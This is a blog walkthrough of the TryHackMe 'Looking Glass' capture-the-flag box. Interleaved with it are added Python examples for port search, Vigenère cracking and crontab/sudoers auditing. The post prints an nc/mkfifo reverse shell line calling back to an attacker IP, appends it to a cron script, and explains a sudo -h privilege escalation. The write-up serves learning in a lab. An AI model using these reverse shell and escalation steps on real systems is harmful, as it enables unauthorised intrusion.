TryHackMe: Looking Glass Walkthrough

Yebberdog
8 min read · Oct 25, 2020


Today I am attempting the Looking Glass challenge from TryHackMe, which is rated as a medium box. The tags do not give much away, but given the association with Alice, it should be quite a strange ride.

As always, let's scan all ports with nmap before moving on to a full version scan.

Wow, that is just one page of ports; there are literally hundreds of them. I will try a service scan and see what that gives us:

All of these ports are SSH, although they are running the Dropbear SSH server, a lightweight implementation mainly used in environments with limited memory and processor resources, such as embedded systems.

SSH:

Connecting to any of the open SSH ports gives us an output of ‘Higher’ or ‘Lower’, which appears to be a clue for determining the correct port we need to use.

Trying to log into the lowest port from the scan gives us the output ‘Lower’, which does not make much sense. Thinking back to the clue, we are told that Looking Glass is a mirror, so it makes sense that we need to reverse the output: ‘Lower’ means we need to go higher, and we can iterate between high and low values to find the correct port.

After lots of iteration, we reach the correct port and what appears to be an encrypted version of the Jabberwocky poem is displayed. At the bottom we are asked to enter a secret password, so one assumes that we need to crack the cipher.
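The "mirrored" search described above is an ordinary binary search with the comparison inverted, which is why it converges in a dozen or so connections even across thousands of ports. The following Python is an added example, not code from the original walkthrough: the box's SSH responses are replaced by a constructed oracle function so that it runs offline, and in practice the hint callback would wrap whatever connects to each candidate port and reads the reply.

```python
# Added example (not from the walkthrough): binary search over a port range
# driven by the box's mirrored "Higher"/"Lower" hints.


def mirrored_hint(target: int, port: int) -> str:
    """Constructed stand-in for the box. The hint is mirrored: it says 'Lower'
    when the correct port is actually higher than the one tried."""
    if port == target:
        return "Correct"
    return "Lower" if port < target else "Higher"


def find_port(hint, low: int, high: int, mirrored: bool = True):
    """Binary-search the inclusive range [low, high] for the port whose hint is
    'Correct'. `hint(port)` returns the server's text for that port. With
    mirrored=True a 'Lower' answer means the target lies above `port`.
    Returns (port or None, number of probes made)."""
    probes = 0
    while low <= high:
        mid = (low + high) // 2
        probes += 1
        answer = hint(mid)
        if answer == "Correct":
            return mid, probes
        if mirrored:
            go_higher = answer == "Lower"
        else:
            go_higher = answer == "Higher"
        if go_higher:
            low = mid + 1
        else:
            high = mid - 1
    return None, probes


if __name__ == "__main__":
    # Constructed target somewhere inside a range of a few thousand open ports.
    def oracle(port):
        return mirrored_hint(12345, port)

    print(find_port(oracle, 9000, 14000))                  # (12345, 12)
    print(find_port(oracle, 9000, 14000, mirrored=False))  # taking hints literally never converges
```

Taking the hints literally walks away from the target and exhausts the range, which is the behaviour the post observed before realising the output was mirrored.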

Looking at the text, it follows the structure of the actual poem, so it is likely a rotation cipher such as ROT13 or a Vigenère cipher. ROT13 and its variations did not work; if it is Vigenère, we will need the key, which we do not have. There are sites out there that can brute force the key, which is what we will do.

The first few attempts did not work, so I increased the ‘Max Key Length’ to 20 and tried again.

This time we managed to decode it and the decryption key was recovered. We can now use the key to decrypt the whole poem.
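What the online tool does behind the ‘Max Key Length’ setting is split the ciphertext into one column per key position and pick, for each column, the Caesar shift whose output looks most like English. The Python below is an added example, not the post's code or the tool's: it implements the Vigenère cipher, recovers the key for a given key length by chi-squared frequency analysis, and ranks candidate key lengths by index of coincidence. The plaintext is four stanzas of Carroll's Jabberwocky and the key "LOOK" is a constructed choice for the demonstration; the box's actual key and ciphertext are not reproduced.

```python
from string import ascii_uppercase

# Relative frequency (percent) of each letter A..Z in English prose.
ENGLISH_FREQ = [8.17, 1.49, 2.78, 4.25, 12.70, 2.23, 2.02, 6.09, 6.97, 0.15,
                0.77, 4.03, 2.41, 6.75, 7.51, 1.93, 0.10, 5.99, 6.33, 9.06,
                2.76, 0.98, 2.36, 0.15, 1.97, 0.07]


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter by the matching key letter. Non-letters pass through
    unchanged and do not advance the key, the usual convention for this cipher."""
    key = key.upper()
    out, k = [], 0
    for ch in text:
        if ch.isalpha():
            shift = ord(key[k % len(key)]) - ord("A")
            if decrypt:
                shift = -shift
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def chi_squared(column: str) -> float:
    """Distance of a letter column's frequencies from English (lower is closer)."""
    n = len(column)
    counts = [column.count(c) for c in ascii_uppercase]
    return sum((obs - n * exp / 100) ** 2 / (n * exp / 100)
               for obs, exp in zip(counts, ENGLISH_FREQ))


def recover_key(ciphertext: str, key_length: int) -> str:
    """For each key position, choose the shift whose decrypted column is
    closest to English letter frequencies."""
    letters = "".join(c for c in ciphertext.upper() if c.isalpha())
    key = []
    for i in range(key_length):
        column = letters[i::key_length]
        best = min(range(26), key=lambda s: chi_squared(
            "".join(chr((ord(c) - 65 - s) % 26 + 65) for c in column)))
        key.append(chr(65 + best))
    return "".join(key)


def index_of_coincidence(column: str) -> float:
    """Probability that two letters drawn from the column are equal; roughly
    0.066 for English-like text and 0.038 for uniformly random letters."""
    n = len(column)
    if n < 2:
        return 0.0
    return sum(column.count(c) * (column.count(c) - 1)
               for c in ascii_uppercase) / (n * (n - 1))


def rank_key_lengths(ciphertext: str, max_len: int = 20) -> list:
    """Candidate key lengths 1..max_len (the tool's 'Max Key Length'), best
    first. Multiples of the true length score as well as the length itself,
    so the shortest of the top-scoring candidates is the usual pick."""
    letters = "".join(c for c in ciphertext.upper() if c.isalpha())
    score = {L: sum(index_of_coincidence(letters[i::L]) for i in range(L)) / L
             for L in range(1, max_len + 1)}
    return sorted(score, key=score.get, reverse=True)


# Constructed demo input: four stanzas of Jabberwocky under a key of our own.
PLAINTEXT = """Beware the Jabberwock, my son! The jaws that bite, the claws that catch!
Beware the Jubjub bird, and shun the frumious Bandersnatch!
He took his vorpal sword in hand; long time the manxome foe he sought,
so rested he by the Tumtum tree, and stood awhile in thought.
And, as in uffish thought he stood, the Jabberwock, with eyes of flame,
came whiffling through the tulgey wood, and burbled as it came!
One, two! One, two! And through and through the vorpal blade went snicker-snack!
He left it dead, and with its head he went galumphing back."""
KEY = "LOOK"
CIPHERTEXT = vigenere(PLAINTEXT, KEY)

if __name__ == "__main__":
    print("candidate key lengths:", rank_key_lengths(CIPHERTEXT, 20)[:5])
    found = recover_key(CIPHERTEXT, len(KEY))
    print("recovered key:", found)
    print(vigenere(CIPHERTEXT, found, decrypt=True))
```

With about a hundred letters per column the chi-squared test picks the right shift comfortably; the reason short ciphertexts or long keys defeat it is that each column then holds too few letters for frequencies to mean anything, which is also why raising the maximum key length on the website only helps when the ciphertext is long enough to support it.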

At the bottom of the decrypted text we can see the secret message we have to enter into the terminal.

So this looks like a username and password, probably SSH credentials for port 22.

First we can grab the user.txt file, but something is wrong here as the flag does not match the required TryHackMe format. Ahhhh, it's mirrored, so we need to reverse it back.

Looking in the home directory, we have some interesting files, mainly poem.txt and twasBrillig.sh.

The poem.txt file is just that, nothing else of interest in there.

twasBrillig.sh is a bash script:

This script just outputs the poem using wall; however, it could be called by a cron job.

To see whether we can run any commands with elevated privileges, we can use the command ‘sudo -l -l’.

OK, so this is more interesting: we can run /sbin/reboot as root without a password. Let’s see if there are any cron jobs running:

So there is a cron job run by user tweedledum which executes the /home/jabberwock/twasBrillig.sh we saw earlier. There is also a key clue here: the cron job only runs on reboot and, as we saw from the sudo -l command, we can reboot the box as root.
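The weakness here is a cron job whose script lives in another user's home directory and can be modified by that user, so anyone who controls the script runs code as the job's owner at the next boot. The Python below is an added audit script, not part of the walkthrough: it parses /etc/crontab-style lines (including @reboot), and for every absolute path in each command reports whether the file is owned by someone other than root or the job's user, or is group/world writable, or sits in a world-writable directory. The crontab and script files in `demo()` are constructed in a temporary directory so the check runs offline; on a real host you would feed it /etc/crontab and /etc/cron.d/* as root.

```python
import os
import pwd
import stat
import tempfile

SPECIAL_SCHEDULES = ("@reboot", "@yearly", "@annually", "@monthly",
                     "@weekly", "@daily", "@hourly")


def parse_system_crontab(text):
    """Yield (schedule, user, command) from /etc/crontab or /etc/cron.d style
    lines, which carry a user field before the command (per-user crontabs
    from `crontab -l` have no user field and are not handled here)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first:                      # PATH=..., MAILTO=...
            continue
        if first in SPECIAL_SCHEDULES:
            parts = line.split(None, 2)       # @reboot user command
            needed = 3
        else:
            parts = line.split(None, 6)       # m h dom mon dow user command
            needed = 7
        if len(parts) < needed:
            continue
        yield " ".join(parts[:needed - 2]), parts[needed - 2], parts[needed - 1]


def resolve_uid(user):
    """Numeric uid for a user name (or a numeric string); None if unknown."""
    if user.isdigit():
        return int(user)
    try:
        return pwd.getpwnam(user).pw_uid
    except KeyError:
        return None


def file_issues(path, cron_user):
    """Reasons why `path` could be altered by someone other than root or the
    job's owner. Missing paths (arguments that are not files) yield nothing."""
    issues = []
    try:
        st = os.stat(path)
    except OSError:
        return issues
    if st.st_uid not in (0, resolve_uid(cron_user)):
        issues.append(f"owned by uid {st.st_uid}, not root or {cron_user}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("file is group/world writable")
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        issues.append("parent directory is world writable without sticky bit")
    return issues


def audit_crontab(text):
    """Return (user, schedule, path, issue) for every risky path in the crontab."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        for token in command.split():
            if token.startswith("/"):
                for issue in file_issues(token, user):
                    findings.append((user, schedule, token, issue))
    return findings


def demo():
    """Constructed crontab: one job whose script is world writable and one that
    is not. Returns (findings, weak_path, safe_path)."""
    try:
        me = pwd.getpwuid(os.getuid()).pw_name
    except KeyError:
        me = str(os.getuid())
    d = tempfile.mkdtemp()
    safe = os.path.join(d, "safe.sh")
    weak = os.path.join(d, "twasBrillig.sh")
    for p in (safe, weak):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho poem | wall\n")
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)
    crontab = (f"PATH=/usr/bin:/bin\n"
               f"@reboot {me} {weak}\n"
               f"0 3 * * * {me} /bin/sh {safe}\n")
    return audit_crontab(crontab), weak, safe


if __name__ == "__main__":
    for user, schedule, path, issue in demo()[0]:
        print(f"[{user}] {schedule} {path}: {issue}")
```

The ownership check treats root-owned files as trusted so that interpreters such as /bin/sh are not reported; the case in the post (a script owned by a third user) would be flagged by the first test, and a script a cron user has left world writable by the second.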

Privilege Escalation to Tweedledum:

So the attack vector is to overwrite the twasBrillig.sh file with a reverse shell, set up a listener on our attack machine and then reboot the remote machine. If all goes to plan, we should elevate to user tweedledum.

For the reverse shell I will use an sh + nc shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc [IPADDRESS] [PORT] >/tmp/f

I will append the shell script to the twasBrillig.sh file:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.6.68 4444 >/tmp/f' >> twasBrillig.sh

I will set up my listener on port 4444 so we can catch the reverse shell. For information, I will be using Pwncat as the listener.

Reboot the machine with ‘sudo reboot’. After a short while, once the remote machine has booted, we get our reverse shell and have escalated to user tweedledum.

Looking in tweedledum's home directory, we can see some further interesting files:

Humptydumpty.txt

Using Hashes.com, I paste these into the hash identifier and we can see that each line appears to be SHA256, with the exception of the last one, which is hex encoded. I will try to use the same site to crack the hashes.

The last hash gives us a password which we assume is for humptydumpty, so we try to switch to this user and it works; we are now user humptydumpty.

Changing to the user's home directory, we see a poetry.txt file which appears to contain a dialogue between Alice and others, so following the last method, I guess we now need to escalate to Alice.

On checking Alice’s home directory we can see some strange permissions indicating that we can execute commands.

Changing into Alice’s directory, we do not have permission to list its contents; however, it appears that we can still run commands on files inside it:

Let’s see if we can get the SSH credentials:

That’s strange, the id_rsa key is owned by humptydumpty. Anyway, I will copy the id_rsa key to /home/humptydumpty and then download it to my attack machine, so we can hopefully SSH in as Alice.

First we need to change the permissions of the id_rsa file to 600, which we can do using chmod.

chmod 600 id_rsa

As I prefer to use Pwncat for its features, I will send a bash reverse shell back to my attack machine and use Pwncat to catch it.

We are now Alice and we have a nice Pwncat shell. Let’s look around her home directory:

There is a file called kitten.txt, but it really does not help much. Time to upload an enumeration script; the one I will use is the Linux Smart Enumeration script:

Download it on your attack box using the quick one-liner.

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh

Upload it to /home/alice. I will use the upload function in Pwncat; however, a simple HTTP server will also serve the purpose.

Once uploaded, change the permissions of the file to make it executable.

chmod +x lse.sh

We can then run the enumeration script. I will set the verbosity level to 1, so it only details important information, and pipe the output through tee to a file called lse.txt so we can review the information.

./lse.sh -l 1 | tee lse.txt

OK, so we get a lot of information, but I really like the way this script presents the data in an easy-to-understand way. Looking through the output:

Very quickly we can see that we can read the sudoers file which contains a key piece of information.

Although we cannot use sudo -l directly to find Alice's sudo privileges, as we do not know her password, the sudoers file shows that Alice can run /bin/bash as root. Again, we cannot run this directly with sudo /bin/bash, but we can use the -h (host) flag with sudo. From the sudoers file we can see the host is ssalg-gnikool, which is looking-glass backwards. To prove this we can run the following command:

sudo -h ssalg-gnikool -l -l

The -l flag lists the user's privileges; -l -l gives the longer format.

So our exploit is now clear: we can run /bin/bash as root.

sudo -h ssalg-gnikool /bin/bash
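The point the root step turns on is that a sudoers entry is keyed by user and host, and an entry bound to a hostname other than the machine's own is not visible in a plain `sudo -l` but, as the post shows, is matched when that hostname is supplied with `sudo -h`. The Python below is an added audit example, not the post's code and not sudo's own parser: it handles the common `user host=(runas) TAG: command` form of a user specification (aliases and Defaults are skipped), shows which entries apply to a user on a given host, and flags the findings that mattered in this box: NOPASSWD commands, shells granted as root, and entries bound to a foreign hostname. The sample sudoers lines are constructed to resemble what the walkthrough describes, not copied from the box.

```python
import os
import re

# user  host = (runas)  [TAG:] command[, command...]
USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def parse_sudoers(text):
    """Parse user-specification lines into dicts with user, host, runas, tags
    and command. Tags such as NOPASSWD: persist across the commands that follow
    them in the same specification, as they do in sudoers itself."""
    entries = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        tags = []
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while ":" in cmd and cmd.split(":", 1)[0].strip().isupper():
                tag, cmd = cmd.split(":", 1)
                tags = tags + [tag.strip()]
                cmd = cmd.strip()
            entries.append({"user": m.group("user"), "host": m.group("host"),
                            "runas": m.group("runas") or "root",
                            "tags": list(tags), "command": cmd})
    return entries


def applicable(entries, user, host):
    """Entries that apply to `user` when the host being matched is `host`.
    ALL matches any host; a specific hostname only matches itself."""
    return [e for e in entries if e["user"] == user and e["host"] in ("ALL", host)]


def report(entries, local_host):
    """(user, message) findings: passwordless commands, shells as root, and
    entries bound to a hostname other than this machine's."""
    findings = []
    for e in entries:
        parts = e["command"].split()
        if "NOPASSWD" in e["tags"]:
            findings.append((e["user"], f"runs {e['command']} as {e['runas']} without a password"))
        if parts and os.path.basename(parts[0]) in SHELLS:
            findings.append((e["user"], f"gets a shell ({e['command']}) as {e['runas']} on host {e['host']}"))
        if e["host"] not in ("ALL", local_host):
            findings.append((e["user"], f"entry bound to host {e['host']}: hidden from plain "
                                        f"sudo -l, selectable with sudo -h {e['host']}"))
    return findings


# Constructed sample modelled on the entries the walkthrough describes.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
jabberwock ALL=(root) NOPASSWD: /sbin/reboot
alice ssalg-gnikool=(root) /bin/bash
"""

if __name__ == "__main__":
    entries = parse_sudoers(SAMPLE_SUDOERS)
    print("alice on looking-glass:", applicable(entries, "alice", "looking-glass"))
    print("alice on ssalg-gnikool:", applicable(entries, "alice", "ssalg-gnikool"))
    for user, message in report(entries, "looking-glass"):
        print(f"{user}: {message}")
```

Running this over a real sudoers file (read as root, or as a user who can read it as Alice could here) gives a quick list of the entries a plain `sudo -l` would not reveal, which is the check a defender would want before trusting that output.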

All that is left to do is grab the root.txt flag and read the_end.txt file.

Another fantastic box, which I did struggle with, and unfortunately I forgot to reset my time, so I ended up having to restart a few times. That said, I certainly learnt a lot with this box, especially the root privesc, as this was not a method I had come across before.

A massive thank you to NinjaJc01 for this excellent challenge, I really enjoyed it.
